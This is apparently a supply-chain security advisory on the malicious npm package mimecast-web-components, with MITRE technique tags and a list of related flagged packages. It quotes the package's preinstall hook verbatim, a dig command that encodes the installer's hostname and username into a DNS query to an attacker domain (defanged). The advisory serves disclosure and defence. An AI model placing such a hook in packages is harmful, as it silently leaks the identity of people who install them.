mimecast-web-components@2.0.0
Malicious code in mimecast-web-components (npm)
T1059 · Command and Scripting InterpreterT1082 · System Information DiscoveryT1071.004 · DNST1041 · Exfiltration Over C2 Channel
Analysis
mimecast-web-components is a combosquat dummy package whose preinstall hook performs DNS-based host-fingerprint exfiltration: it runs dig +short "$(echo c-$(hostname)-$(whoami) | base32 | tr -d '=' | rev).canary[.]rebind[.]fun[.]offensive[.]work", encoding the victim's hostname and username into a subdomain query to an attacker-controlled DNS endpoint. The index.js is a 5-line dummy stub disguising the package as combosquat prevention. The DNS exfiltration is a recon beacon that leaks installer identity to the attacker's infrastructure.
- analyzed by
- Leitwacht
- first seen
- Jun 10, 2026, 05:32 PM
- analyzed
- Jun 10, 2026, 05:32 PM
Related advisories
- sme-rko-finance-front-operations-notifications-impl@35.8.1
- dolyame-ui-cardlogo@35.8.1
- dolyame-ui-contextmenu@35.8.1
- dolyame-ui-contenteditable@35.8.1
- dolyame-ui-mediainfohoc@35.8.1
- dolyame-ui-inputtime@35.8.1
- dolyame-ui-selectaccount@35.8.1
- dolyame-ui-stateutils@35.8.1
Independently detected by the Leitwacht supply-chain probe. IOCs are defanged. Published CC0. Think this is a mistake? See the dispute policy.